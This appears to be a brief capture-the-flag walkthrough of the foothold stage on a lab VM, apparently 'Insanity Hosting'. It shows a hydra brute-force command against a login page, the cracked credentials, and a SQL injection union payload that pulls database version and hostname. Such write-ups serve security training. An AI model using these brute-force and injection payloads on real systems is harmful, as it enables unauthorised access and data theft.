Foothold

http://192.168.199.124/news/

❯ echo 192.168.199.124 insanityhosting.vm | sudo tee -a /etc/hosts

http://192.168.199.124/monitoring/login.php

❯ hydra -I -vV -f -l otis -P ~/opt/1000_pwd.txt 'http-post-form://192.168.199.124/monitoring/login.php:username=^USER^&password=^PASS^:C=/:F=302'

otis:123456

Will come into play

http://insanityhosting.vm/webmail/src/login.php

otis:123456

Exploit didnt work so trying SQL injection instead

Tried again with "

Gives us the whole DB

" union select 1,@@version,@@hostname,4,5 -- -

Last updated 1 year ago